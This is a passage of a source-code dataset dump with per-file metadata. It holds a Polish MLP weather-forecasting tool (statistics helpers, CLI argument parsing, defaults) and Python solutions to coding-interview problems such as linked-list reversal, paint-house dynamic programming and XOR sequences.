Wynikiem jest słownik z miarami statystycznymi wyników testowych.\n\n    Args:\n        clf: klasyfikator MLP\n        train_in: macierz Mu x N ucząca\n        train_out: wektor 1 x Mu uczący\n        test_in: macierz Mt x N testowa\n        test_out: wektor 1 x Mt\n        tolerance: maksymalne odchylenie wyniku\n        res_scale: skala klas wynikowych\n\n    Raises:\n        ValueError: jeśli nie zgadzają się wymiary macierzy i wektorów\n\n    Returns:\n        słownik z miarami statystycznymi testowania klasyfikatora\n    \"\"\"\n\n    # sprawdzenie macierzy i wektora uczącego\n    m = len(train_in)\n    n = len(train_in[0])\n    if not all(len(r) == n for r in train_in):\n        msg = \"wszystkie wiersze w macierzy train_in powinny mieć długość {}\".format(n)\n        L.error(msg)\n        raise ValueError(msg)\n    if not len(train_out) == m:\n        msg = \"wektor train_out powinien mieć wymiary 1 x {}, a nie 1 x {}\".format(m, len(train_out))\n        L.error(msg)\n        raise ValueError(msg)\n    # sprawdzenie macierzy i wektora testowego\n    m = len(test_out)\n    if not all(len(r) == n for r in test_in):\n        msg = \"wszystkie wiersze w macierzy test_in powinny mieć długość {}\".format(n)\n        L.error(msg)\n        raise ValueError(msg)\n    if not len(test_out) == m:\n        msg = \"wektor test_out powinien mieć wymiary 1 x {}, a nie 1 x {}\".format(m, len(test_out))\n        L.error(msg)\n        raise ValueError(msg)\n\n    unscaled_test_out = [to / res_scale for to in test_out]\n\n    clf.fit(train_in, train_out)\n\n    result = clf.predict(test_in)\n    unscaled_result = [r / res_scale for r in result]\n\n    stats = _get_test_stats(unscaled_test_out, unscaled_result, tolerance)\n\n    return unscaled_test_out, unscaled_result, stats\n\n\ndef _variance(v: typing.List[float]) -> float:\n    \"\"\"Zwraca wariancję zbioru.\n\n    Args:\n        v: wektor z liczbami\n\n    Returns:\n        wariancja\n    \"\"\"\n\n    e = sum(v) / len(v)\n    vnc = sum((x - e) ** 2 for x in v) / len(v)\n    return vnc\n\n\ndef _standard_deviation(v: typing.List[float]) -> float:\n    \"\"\"Zwraca odchylenie standardowe zbioru.\n\n    Args:\n        v: wektor z liczbami\n\n    Returns:\n        odchylenie standardowe\n    \"\"\"\n\n    return _variance(v) ** 0.5\n\n\ndef _median(values: typing.List[float]) -> float:\n    \"\"\"Zwraca medianę wektora.\n\n    Args:\n        values: wektor z liczbami\n\n    Returns:\n        mediana\n    \"\"\"\n\n    s_vals = list(sorted(values))\n    if len(s_vals) % 2 == 1:\n        # nieparzysta liczba elementów: środkowy element listy\n        return s_vals[len(s_vals) // 2]\n    return (s_vals[len(s_vals) // 2 - 1] + s_vals[len(s_vals) // 2]) / 2\n\n\ndef _get_test_stats(expected: typing.List[float], result: typing.List[float], tol: float, dec_places: int = 3,\n                    ) -> typing.Dict[str, float]:\n    \"\"\"Zwraca słownik z miarami statystycznymi dla wyniku testowania klasyfikatora MLP.\n    Zmienna tol mówi jakie odchylenie wyniku jest dopuszczalne.
Powyżej tego wynik jest nieprawidłowy.\n\n Args:\n expected: lista z oczekiwanymi wartościami po przeskalowaniu\n result: lista z wynikami po przeskalowaniu\n tol: maksymalne dopuszczalne odchylenie wyniku\n dec_places: liczba miejsc po przecinku, domyślnie 3\n\n Returns:\n słownik z miarami statystycznymi\n\n Raises:\n ValueError: jeśli wektory wejściowe mają różne wymiary\n \"\"\"\n\n if len(expected) != len(result):\n msg = \"wielkości wektorów z oczekiwanymi i otrzymanymi wynikami powinny być identyczne\"\n L.error(msg)\n raise ValueError(msg)\n\n diffs = [abs(r - expected[i]) for i, r in enumerate(result)]\n result_sum = sum(1 if d <= tol else 0.5 if d <= 2 * tol else 0 for d in diffs)\n result_score = round(result_sum / len(diffs), dec_places)\n mean_diff = sum(diffs) / len(diffs)\n max_diff = max(diffs)\n med_diff = _median(diffs)\n sd_diff = _standard_deviation(diffs)\n\n return {\n 'result_score': round(result_score, dec_places),\n 'mean_diff': round(mean_diff, dec_places),\n 'max_diff': round(max_diff, dec_places),\n 'med_diff': round(med_diff, dec_places),\n 'sd_diff': round(sd_diff, dec_places),\n 'expected_sd': round(_standard_deviation(expected), dec_places),\n 'result_sd': round(_standard_deviation(result), dec_places),\n }\n\n\ndef predict(data: typing.Dict[datetime.datetime, dict], clf: snn.MLPClassifier, intervals: int) -> float:\n \"\"\"Prognozuje za pomocą wyznaczonego klasyfikatora MLP.\n\n Args:\n l2_data: słownik z danymi (data -> słownik z parametrami)\n clf: klasyfikator\n intervals: liczba dat potrzebnych do użycia klasyfikatora\n\n Returns:\n prognozowana wartość\n \"\"\"\n\n input_dts = list(sorted(data))[-intervals:]\n\n # print('----------------')\n # for idt in input_dts:\n # print(idt)\n # print('----------------')\n\n in_vals = _flatten(_get_input_params(input_dts, data))\n # print(in_vals)\n # print(len(in_vals))\n\n res = clf.predict([in_vals])\n # print('-- predicted ---')\n # print(res)\n res = res[0]\n # print(res)\n # print('----------------')\n\n return res\n"
},
{
"alpha_fraction": 0.54666668176651,
"alphanum_fraction": 0.54666668176651,
"avg_line_length": 17.75,
"blob_id": "f437cb17caec715d4cd9b72f6a7bf4ffbf096301",
"content_id": "bb36c217df0a5c3677dfda821f190b03c9aba14b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 75,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 4,
"path": "/tools/__main__.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "from . import command_line as cl\n\nif __name__ == '__main__':\n cl.main()\n"
},
{
"alpha_fraction": 0.630476176738739,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 22.863636016845703,
"blob_id": "78040648a96f98638d325a52e23f832fae70b022",
"content_id": "1950066ba325c9d487c006b0cdbc0961e1c79f84",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 525,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 22,
"path": "/dvik_forecast/defaults.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import datetime\nimport os\n\nLOGGER_NAME = \"dvik-forecast:{}\".format(os.getpid())\n\nUTC_NOW = datetime.datetime.utcnow()\nHOME = os.path.expanduser('~')\nLOG_FILE_NAME = 'dvik_forecast.log'\nLOOP2_FILE_RE = r'loop2_\\d{6}_\\d{4}\\.dat'\nLOOP2_FILE_DT = 'loop2_%y%m%d_%H%M.dat'\n\n# args\nLOOP2_DATA_TYPE = 'loop2'\nIMGW_DATA_TYPE = 'imgw'\nOUTPUT_DIR = os.path.join(HOME, 'dvf_data', 'forecast')\nLOGS_DIR = os.path.join(HOME, 'dvf_data', 'logs')\nRANGE_DAYS = 61\nINTERVAL = 3\nTRAIN_SETS = 10\nTRAIN_DAYS = 3\nTEST_SETS = 5\nHORIZONS = [12, 24]\n"
},
{
"alpha_fraction": 0.5870455503463745,
"alphanum_fraction": 0.6003584265708923,
"avg_line_length": 38.45454406738281,
"blob_id": "19caa7b9808da692403d7493cf6e048629e54490",
"content_id": "bbea37daa8326b49e56db6f867b9758db734ea90",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3973,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 99,
"path": "/dvik_forecast/command_line.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import argparse as ap\nimport os\n\nfrom . import defaults as dfs\nfrom . import forecast as fct\n\n\ndef _positive_int(value: str) -> int:\n \"\"\"Sprawdzam czy wartość jest dodatnią liczbą całkowitą. Jeśli nie, to rzuca ValueError.\n\n Args:\n value: sprawdzana wartość\n\n Returns:\n wartość, jeśli jest dodatnią liczbą całkowitą\n\n Raises:\n ValueError: jeśli podana wartość nie jest dodatnią liczbą całkowitą\n \"\"\"\n\n value = int(value)\n if value <= 0:\n raise ValueError('{} <= 0, powinno być > 0'.format(value))\n return value\n\n\ndef _parse_args() -> ap.Namespace:\n \"\"\"Parsuje parametry wejściowe:\n\n * -l2d, --loop2_dir - ścieżka do katalogu z danymi LOOP2\n * -d, --days - liczba dni wstecz (domyślnie 61)\n * -m, --m_learn - liczba próbek uczących (domyślnie 10)\n * -n, --n_test - liczba próbek testowych (domyślnie 5)\n * -o, --output_dir - katalog na wyniki (domyślnie $HOME/dvf_data/forecast)\n * -l, --logs_dir - katalog na logi (domyślnie $HOME/dvf_data/logs)\n * -i, --interval - interwał czasowy (1, 2, 3, 4, 6 lub 12, domyślnie 3)\n * -s, --horizons - horyzonty prognozy (np. 6, 12, 18, 24, domyślnie 12 i 24)\n\n Returns:\n przestrzeń argumentów\n \"\"\"\n\n parser = ap.ArgumentParser()\n\n parser.add_argument('-t', '--data_type', required=True,\n choices=(dfs.LOOP2_DATA_TYPE, dfs.IMGW_DATA_TYPE),\n help='Rodzaj danych, na podstawie których będzie wyznaczana prognoza.')\n\n parser.add_argument('-dd', '--data_dir', required=True,\n help='Ścieżka do katalogu z danymi. Musi być zgodna z rodzajem danych.')\n\n parser.add_argument('-od', '--output_dir', default=dfs.OUTPUT_DIR,\n help='Katalog na wyniki (domyślnie {}).'.format(dfs.OUTPUT_DIR))\n\n parser.add_argument('-ld', '--logs_dir', default=dfs.LOGS_DIR,\n help='Katalog na logi (domyślnie {}).'.format(dfs.LOGS_DIR))\n\n parser.add_argument('-d', '--range_days', default=dfs.RANGE_DAYS, type=_positive_int,\n help='Liczba dni wstecz (domyślnie {}).'.format(dfs.RANGE_DAYS))\n\n parser.add_argument('-i', '--interval', default=dfs.INTERVAL, choices=(1, 2, 3, 4, 6, 12), type=int,\n help='Interwał czasowy (1, 2, 3, 4, 6 lub 12, domyślnie {}).'.format(dfs.INTERVAL))\n\n parser.add_argument('-ns', '--train_sets', default=dfs.TRAIN_SETS, type=_positive_int,\n help='Liczba zbiorów uczących (domyślnie {}).'.format(dfs.TRAIN_SETS))\n\n parser.add_argument('-nd', '--train_days', default=dfs.TRAIN_DAYS, type=_positive_int,\n help='Wielkość (w dniach) zbiorów uczących'\n ' (domyślnie {}).'.format(dfs.TRAIN_SETS))\n\n parser.add_argument('-ts', '--test_sets', default=dfs.TEST_SETS, type=_positive_int,\n help='Liczba zbiorów testowych (domyślnie {}).'.format(dfs.TEST_SETS))\n\n parser.add_argument('-s', '--horizons', default=dfs.HORIZONS, type=_positive_int, nargs='+',\n help='Horyzonty prognozy (np. 6, 12, 18, 24, domyślnie {}).'\n ' Muszą być podzielne przez interwał.'.format(dfs.HORIZONS))\n\n parser.add_argument('-j', '--cfg_json',\n help=\"Ścieżka do pliku json z nadpisanymi domyślnymi parametrami klasyfikatora.\")\n\n return parser.parse_args()\n\n\ndef main():\n args = _parse_args()\n\n fct.process(\n data_type=args.data_type,\n data_dir=os.path.abspath(args.data_dir),\n cfg_json=args.cfg_json,\n output_dir=os.path.abspath(args.output_dir),\n logs_dir=os.path.abspath(args.logs_dir),\n range_days=args.range_days,\n interval=args.interval,\n train_sets=args.train_sets,\n train_days=args.train_days,\n test_sets=args.test_sets,\n horizons=args.horizons,\n )\n"
}
] | 11 |
seetaram-oruganti/Brain-Out- | https://github.com/seetaram-oruganti/Brain-Out- | 58b614c370c2bff5c4d5a783f6c20cafc673dfd6 | 2b7bcd633ec29ffa110e56a9e8faf81ccdd947a6 | 43baeecdcfa3ea2c0fa368dff52bce59b7936378 | refs/heads/master | 2022-11-27T13:05:32.338642 | 2020-07-28T18:04:19 | 2020-07-28T18:04:19 | 273,936,349 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6102941036224365,
"alphanum_fraction": 0.6259191036224365,
"avg_line_length": 23.700786590576172,
"blob_id": "3dc771b11da2b621be0c3cc62fb7f3bcbf6a3457",
"content_id": "a1b67c9655c445dd7086066ff89fd714e4c01986",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3272,
"license_type": "no_license",
"max_line_length": 271,
"num_lines": 127,
"path": "/Enormous Input Test Problem Code_INTEST.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nQUESTION\r\n\r\nEnormous Input Test Problem Code: INTEST\r\nAdd problem to Todo list\r\nSubmit\r\n\r\n \r\nThe purpose of this problem is to verify whether the method you are using to read input data is sufficiently fast to handle problems branded with the enormous Input/Output warning. You are expected to be able to process at least 2.5MB of input data per second at runtime.\r\n\r\nInput\r\nThe input begins with two positive integers n k (n, k<=107). The next n lines of input contain one positive integer ti, not greater than 109, each.\r\n\r\nOutput\r\nWrite a single integer to output, denoting how many integers ti are divisible by k.\r\n\r\nExample\r\nInput:\r\n7 3\r\n1\r\n51\r\n966369\r\n7\r\n9\r\n999996\r\n11\r\n\r\nOutput:\r\n4\r\n\"\"\"\r\n\r\n\r\n''' \r\nfast I/O methods in python for competitive programming:\r\nIn competitive programming it is important to read the input as fast as possible so we don’t lose valuable \r\ntime. We can test our input and output methods on the problem INTEST – Enormous Input Test on SPOJ. \r\nBefore you keep on reading I encourage you to solve the problem first.\r\n– Bad way:\r\nThe program below uses input and print and gets the verdict time limit exceeded.'''\r\n\"\"\"\r\ndef main():\r\n n, k = [int(c) for c in input().split()]\r\n cnt = 0\r\n for _ in range(n):\r\n t = int(input())\r\n if t % k == 0:\r\n cnt += 1\r\n print(cnt)\r\n \r\nif __name__ == \"__main__\":\r\n main() \r\n\r\n'''\r\n+ Good way:\r\nInstead of input and print we should use stdin.readline() and stdout.write(). The program below \r\ngets accepted with a runtime of 2.36 seconds.\r\n'''\r\n\r\nfrom sys import stdin, stdout \r\n \r\ndef main():\r\n n, k = [int(c) for c in input().split()]\r\n cnt = 0\r\n for _ in range(n):\r\n t = int(stdin.readline())\r\n if t % k == 0:\r\n cnt += 1\r\n stdout.write(str(cnt))\r\nif __name__ == \"__main__\":\r\n main() \r\n\r\n'''\r\n\r\n++ Better way:\r\nWe can read the whole input at once and load it into a list. The code below gets accepted with \r\na runtime of 1.70 seconds. \r\n'''\r\n\"\"\"\r\ndef main():\r\n from sys import stdin, stdout\r\n n, k = stdin.readline().split()\r\n n = int(n)\r\n k = int(k)\r\n \r\n cnt = 0\r\n lines = stdin.readlines()\r\n for line in lines:\r\n if int(line) % k == 0:\r\n cnt += 1\r\n \r\n stdout.write(str(cnt))\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n\r\n'''\r\nHow to read input in Python in Codeforces\r\nSuppose in Codeforces (or a similar online judge) you have to read numbers a b c d and print their product. In Python 3.4 you can do it as follows:\r\nMethod 1a: Using a list comprehension\r\n'''\r\n\"\"\"\r\n\r\na, b, c, d = [int(x) for x in input().split()]\r\nprint(a*b*c*d)\r\n\r\n# Method 1b: Using the map function\r\n\r\na, b, c, d = map(int, input().split())\r\nprint(a*b*c*d)\r\n\r\n# A faster way is to use stdin and stdout:\r\n# Method 2a: List comprehension with stdin and stdout\r\n\r\nfrom sys import stdin, stdout\r\na, b, c, d = [int(x) for x in stdin.readline().rstrip().split()]\r\nstdout.write( str(a*b*c*d) + \"\\n\" )\r\n\r\n# Method 2b: Map with stdin and stdout\r\n\r\nfrom sys import stdin, stdout\r\na, b, c, d = map( int, stdin.readline().rstrip().split() )\r\nstdout.write( str(a*b*c*d) + \"\\n\" )\r\n\r\n# Note that you have to convert the output a*b*c*d to a string when passing\r\n# it to the function stdout.write(…). \"\"\"\r\n"
},
{
"alpha_fraction": 0.4659009277820587,
"alphanum_fraction": 0.4730796813964844,
"avg_line_length": 20.11111068725586,
"blob_id": "e8e07094b01cafd6a12b025b8098dbdfb7c5a05c",
"content_id": "11b0b788c19f30a1f53c1b56c144fae570b832f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1393,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 63,
"path": "/Palindrome List.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\nPalindrome List\r\n\r\n Asked in: \r\n Amazon\r\n Microsoft\r\n\r\nGiven a singly linked list, determine if its a palindrome. Return 1 or 0 denoting if its a palindrome or not, respectively.\r\n\r\nNotes:\r\n\r\n Expected solution is linear in time and constant in space.\r\n\r\nFor example,\r\n\r\nList 1-->2-->1 is a palindrome.\r\nList 1-->2-->3 is not a palindrome.\r\n\r\n\r\n\r\n\"\"\"\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @return an integer\r\n def lPalin(self, A):\r\n slow = A\r\n fast = A\r\n prev_of_slow = None\r\n while(fast and fast.next):\r\n prev_of_slow = slow\r\n slow = slow.next\r\n fast = fast.next.next\r\n \r\n if(fast == None):\r\n prev_of_slow.next = None\r\n else:\r\n if(prev_of_slow is not None):\r\n prev_of_slow.next = None\r\n mid = slow\r\n slow = slow.next\r\n \r\n # reverse the second half\r\n cur = slow\r\n prev = None\r\n while(cur):\r\n fut = cur.next\r\n cur.next = prev\r\n prev = cur\r\n cur = fut\r\n \r\n first = A\r\n second = prev\r\n \r\n while(first and second):\r\n if(first.val != second.val):\r\n return 0\r\n first = first.next\r\n second = second.next\r\n \r\n return 1\r\n"
},
{
"alpha_fraction": 0.5322299599647522,
"alphanum_fraction": 0.5601045489311218,
"avg_line_length": 19.327102661132812,
"blob_id": "dcd4cca192e029aa5a2ea7e70a42b31c3a6f84b7",
"content_id": "4c6c2def530c382656efe3ae546b9034107288eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2296,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 107,
"path": "/Paint House.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\nPaint House!\r\n\r\n Asked in: \r\n LinkedIn\r\n\r\nProblem Description\r\n\r\nThere are a row of N houses, each house can be painted with one of the three\r\ncolors: red, blue or green.\r\n\r\nThe cost of painting each house with a certain color is different. You have\r\nto paint all the houses such that no two adjacent houses have the same color.\r\n\r\nThe cost of painting each house with a certain color is represented by a N x 3\r\ncost matrix A.\r\n\r\nFor example, A[0][0] is the cost of painting house 0 with color red; A[1][2]\r\nis the cost of painting house 1 with color green, and so on.\r\n\r\nFind the minimum total cost to paint all houses.\r\n\r\n\r\nProblem Constraints\r\n\r\n1 <= N <= 105\r\n\r\n1 <= A[i][j] <= 103\r\n\r\n\r\nInput Format\r\n\r\nFirst and only argument is an 2D integer matrix A of size N x 3 denoting the\r\ncost to paint the houses.\r\n\r\n\r\nOutput Format\r\n\r\nReturn an integer denoting the minimum total cost to paint all houses.\r\n\r\n\r\nExample Input\r\n\r\nInput 1:\r\n\r\n A = [ [1, 2, 3]\r\n [10, 11, 12]\r\n ]\r\n\r\n\r\n\r\nExample Output\r\n\r\nOutput 1:\r\n\r\n 12\r\n\r\n\r\n\r\nExample Explanation\r\n\r\nExplanation 1:\r\n\r\n Paint house 1 with red and house 2 with green i.e A[0][0] + A[1][1] = 1 + 11 = 12\r\n\r\n\r\n\r\n NOTE: You only need to implement the given function. Do not read input,\r\n instead use the arguments to the function. Do not print the output,\r\n instead return values as specified.\r\n Still have a doubt? Checkout Sample Codes for more details. \r\n\r\n\r\n\"\"\"\r\n\r\n\r\nclass Solution:\r\n # @param A : list of list of integers\r\n # @return an integer\r\n def solve(self, A):\r\n pr = 0\r\n pb = 0\r\n pg = 0\r\n n = len(A)\r\n for i in range(1, n+1):\r\n cr = A[i-1][0] + min(pb, pg)\r\n cb = A[i-1][1] + min(pr, pg)\r\n cg = A[i-1][2] + min(pb, pr)\r\n pr , pb , pg = cr, cb, cg\r\n return min(cr,cb,cg )\r\n \r\nclass Solution:\r\n # @param A : list of list of integers\r\n # @return an integer\r\n def solve(self, A):\r\n pr = 0\r\n pb = 0\r\n pg = 0\r\n n = len(A)\r\n for i in range(1, n+1):\r\n cr = A[i-1][0] + min(pb, pg)\r\n cb = A[i-1][1] + min(pr, pg)\r\n cg = A[i-1][2] + min(pb, pr)\r\n pr , pb , pg = cr, cb, cg\r\n return min(cr,cb,cg )\r\n \r\n"
},
{
"alpha_fraction": 0.5782651901245117,
"alphanum_fraction": 0.6276171207427979,
"avg_line_length": 16.574073791503906,
"blob_id": "cc2353a5be9cd11e9f33a71355ed9d4cfa9cd044",
"content_id": "baa7528591bc6737025a60e60d0bd9846c5d4f0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2006,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 108,
"path": "/Xor Sequence.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nXor-sequence\r\n\r\n1337.43 more points to get your next star!\r\nRank: 126652|Points: 862.57/2200\r\nProblem Solving\r\nYour Xor-sequence submission got 40.00 points. \r\nYou are now 1337.43 points away from the 6th star for your problem solving badge.\r\nTry the next challenge | Try a Random Challenge\r\nProblem\r\nSubmissions\r\nLeaderboard\r\nDiscussions\r\nEditorial\r\nAn array, , is defined as follows:\r\n\r\n for , where is the symbol for XOR\r\nYou will be given a left and right index . You must determine the XOR sum of the segment of as .\r\n\r\nFor example, . The segment from to sums to .\r\n\r\nPrint the answer to each question.\r\n\r\nFunction Description\r\n\r\nComplete the xorSequence function in the editor below. It should return the integer value calculated.\r\n\r\nxorSequence has the following parameter(s):\r\n\r\nl: the lower index of the range to sum\r\nr: the higher index of the range to sum\r\nInput Format\r\n\r\nThe first line contains an integer , the number of questions.\r\nEach of the next lines contains two space-separated integers, and , the inclusive left and right indexes of the segment to query.\r\n\r\nConstraints\r\n\r\n\r\n\r\nOutput Format\r\n\r\nOn a new line for each test case, print the XOR-Sum of 's elements in the inclusive range between indices and .\r\n\r\nSample Input 0\r\n\r\n3\r\n2 4\r\n2 8\r\n5 9\r\nSample Output 0\r\n\r\n7\r\n9\r\n15\r\nExplanation 0\r\n\r\nThe beginning of our array looks like this: \r\n\r\nTest Case 0:\r\n\r\n\r\n\r\nTest Case 1:\r\n\r\n\r\n\r\nTest Case 2:\r\n\r\n\r\n\r\nSample Input 1\r\n\r\n3\r\n3 5\r\n4 6\r\n15 20\r\nSample Output 1\r\n\r\n5\r\n2\r\n22\r\n\r\n\"\"\"\r\n\r\n\r\ndef f(n):\r\n if n == 0:\r\n return 0\r\n if n == 1:\r\n return 1\r\n n -= 2\r\n if n % 8 == 0 or n % 8 == 1:\r\n return 2\r\n if n % 8 == 4 or n % 8 == 5:\r\n return 0\r\n if n % 8 == 2 or n % 8 == 3:\r\n return n + 4\r\n if n % 8 == 6 or n % 8 == 7:\r\n return n + 2\r\n assert False\r\n\r\nq = int(input())\r\nassert 1 <= q <= 10 ** 5\r\nfor i in range(q):\r\n l, r = map(int, input().split())\r\n assert 1 <= l <= r <= 10 ** 15\r\n print (f(r) ^ f(l - 1))\r\n"
},
{
"alpha_fraction": 0.43633541464805603,
"alphanum_fraction": 0.4767080843448639,
"avg_line_length": 17.78125,
"blob_id": "7222a083cd7e425c985e5cbd36fab800c41c69dd",
"content_id": "9efdf8565d9beccd901cd517489b67905bcc1a7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1288,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 64,
"path": "/Single no 2.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nSingle Number II\r\nAsked in: \r\nGoogle\r\nAmazon\r\nGiven an array of integers, every element appears thrice except for one which occurs once.\r\n\r\nFind that element which does not appear thrice.\r\n\r\nNote: Your algorithm should have a linear runtime complexity.\r\n\r\nCould you implement it without using extra memory?\r\n\r\nInput Format:\r\n\r\n First and only argument of input contains an integer array A\r\nOutput Format:\r\n\r\n return a single integer.\r\nConstraints:\r\n\r\n2 <= N <= 5 000 000 \r\n0 <= A[i] <= INT_MAX\r\nFor Examples :\r\n\r\nExample Input 1:\r\n A = [1, 2, 4, 3, 3, 2, 2, 3, 1, 1]\r\nExample Output 1:\r\n 4\r\nExplanation:\r\n 4 occur exactly once\r\nExample Input 2:\r\n A = [0, 0, 0, 1]\r\nExample Output 2:\r\n 1\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n\r\nclass Solution:\r\n # @param A : tuple of integers\r\n # @return an integer\r\n def singleNumber(self, A):\r\n k = 31\r\n c1 = 0\r\n c0 = 0\r\n s = \"\"\r\n while(k>-1):\r\n c1 = 0\r\n c0 = 0\r\n for i in A:\r\n if(i&(1<<k)):\r\n c1 += 1\r\n else:\r\n c0 += 1\r\n if(c1%3):\r\n s = s + \"1\"\r\n else:\r\n s = s + \"0\"\r\n k -= 1\r\n \r\n return (int(s,2)) \r\n \r\n"
},
{
"alpha_fraction": 0.42891639471054077,
"alphanum_fraction": 0.4388771653175354,
"avg_line_length": 21.934782028198242,
"blob_id": "e28d2008339dcf9088835b5630f2cfc16c009d6c",
"content_id": "95f5e577d136b4f69671fb15d36a6edd72d91731",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3319,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 138,
"path": "/Reverse Link List II.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\nReverse Link List II\r\n\r\n Asked in: \r\n Facebook\r\n Microsoft\r\n Amazon\r\n\r\nReverse a linked list from position m to n. Do it in-place and in one-pass.\r\n\r\nFor example:\r\nGiven 1->2->3->4->5->NULL, m = 2 and n = 4,\r\n\r\nreturn 1->4->3->2->5->NULL.\r\n\r\n Note:\r\n Given m, n satisfy the following condition:\r\n 1 ≤ m ≤ n ≤ length of list.\r\n\r\n Note 2:\r\n Usually the version often seen in the interviews is reversing the whole linked list which is obviously an easier version of this question. \r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\n##### Editorial #######\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @param B : integer\r\n # @param C : integer\r\n # @return the head node in the linked list\r\n def reverseBetween(self, A, B, C):\r\n \r\n # 1->2->3->4->5->NULL, m = 2 and n = 4,\r\n # 1->4->3->2->5->NULL.\r\n\r\n head = A\r\n current = A\r\n prv = None\r\n nxt = None\r\n \r\n step = 1\r\n \r\n while current is not None:\r\n \r\n if step < B:\r\n prv = current\r\n current = current.next\r\n\r\n if step >= B and step <= C:\r\n if step == B:\r\n # this is a start of the reversed list\r\n last_non_reversed = prv\r\n last_reversed = current\r\n \r\n if step == C:\r\n # this is the end of the reversed list\r\n first_reversed = current\r\n first_non_reversed = current.next\r\n \r\n # part that does reverse\r\n nxt = current.next\r\n current.next = prv\r\n prv = current\r\n current = nxt\r\n\r\n if step > C:\r\n # We can skip these steps\r\n break\r\n \r\n step += 1\r\n \r\n if last_non_reversed is not None:\r\n last_non_reversed.next = first_reversed\r\n \r\n last_reversed.next = first_non_reversed\r\n \r\n if B == 1:\r\n # In this case we did reverse from the very first element\r\n head = prv\r\n \r\n return head\r\n\r\n\r\n\r\n######## Tried Working#####\r\n\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.ne\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @param B : integer\r\n # @param C : integer\r\n # @return the head node in the linked list\r\n def reverseBetween(self, A, B, C):\r\n prev = other = start = None\r\n end = tmp = A\r\n i = 1\r\n\r\n while tmp:\r\n if i == B - 1:\r\n start = tmp\r\n\r\n if i == B:\r\n end = tmp\r\n\r\n if i >= B and i <= C:\r\n next = tmp.next\r\n tmp.next = prev\r\n prev = tmp\r\n tmp = next\r\n else:\r\n tmp = tmp.next\r\n\r\n if i == C:\r\n other = tmp\r\n\r\n i += 1\r\n\r\n end.next = other\r\n if start: start.next = prev\r\n return prev if B == 1 else A\r\n \r\n"
},
{
"alpha_fraction": 0.35481852293014526,
"alphanum_fraction": 0.3917396664619446,
"avg_line_length": 22.060606002807617,
"blob_id": "cbb214ba028408421af73b106516026c1f3ba2ef",
"content_id": "e910b819b6f9097ffa337ab2d73548f8369b9bbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1598,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 66,
"path": "/Largest Number.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nGiven a list of non negative integers,\r\narrange them such that they form the largest number.\r\n\r\nFor example:\r\n\r\nGiven [3, 30, 34, 5, 9], the largest formed number is 9534330.\r\n\r\nNote: The result may be very large, so you need to return a string instead of an integer.\r\n\r\n\"\"\"\r\n\r\nclass Solution:\r\n # @param A : tuple of integers\r\n \r\n # @return a strings\r\n def largestNumber(self, A):\r\n n = len(A)\r\n A = list(A)\r\n self.merges(A, 0, n-1)\r\n s = \"\"\r\n \r\n for i in A:\r\n s = s+str(i)\r\n if(0 == int(s)):\r\n return 0\r\n return s\r\n \r\n def merges(self, ar,l,h):\r\n if(l==h):\r\n return\r\n mid=(l+h)//2\r\n self.merges(ar,l,mid)\r\n self.merges(ar,mid+1,h)\r\n self.merge(ar,l,mid,h)\r\n \r\n def merge(self,ar,l,mid,h):\r\n p1 = l\r\n p2 = mid+1\r\n k = 0\r\n size = h-l+1\r\n temp = [0]*size\r\n while((p1<=mid) and (p2<=h)):\r\n s1 = str(ar[p1])+str(ar[p2])\r\n s2 = str(ar[p2])+str(ar[p1])\r\n if(int(s2)>int(s1)):\r\n temp[k] = ar[p2]\r\n 